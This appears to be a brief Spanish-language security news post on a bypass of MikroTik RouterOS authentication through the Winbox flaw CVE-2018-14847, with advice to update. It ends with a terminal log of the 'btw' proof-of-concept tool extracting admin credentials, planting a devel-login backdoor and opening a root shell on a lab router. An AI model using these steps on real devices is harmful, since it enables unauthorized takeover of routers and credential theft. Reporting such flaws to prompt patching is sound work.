Nueva variante de explotación de vulnerabilidad de Winbox

El equipo de Teenable Research ha encontrado una nueva manera de explotar la vulnerabilidad de Winbox (CVE-2018-14847) que permite tener acceso root directo al equipo.

Esta vulnerabilidad ya ha sido corregida por parte de MikroTik, tal como hemos mencionado en otro artículo, lo que sucede que una gran parte de administradores de red no han actualizado los equipos y éstos están siendo vulnerables.

Este ataque permite evadir la autenticación del RouterOS y permite acceso root al equipo, brindando la posibilidad de una ejecución remota de código arbitrario.

Es recomendable actualizar los routers a la última versión disponible en la rama que se este utilizando.

Mas información en Hispasec y en el blog oficial de MikroTik.

Ejemplo de ingreso al router:

xxxxx@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 
Login failed, incorrect username or password

Connection closed by foreign host.
xxxxx@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴ 

[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials 
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
xxxxx@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 


BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.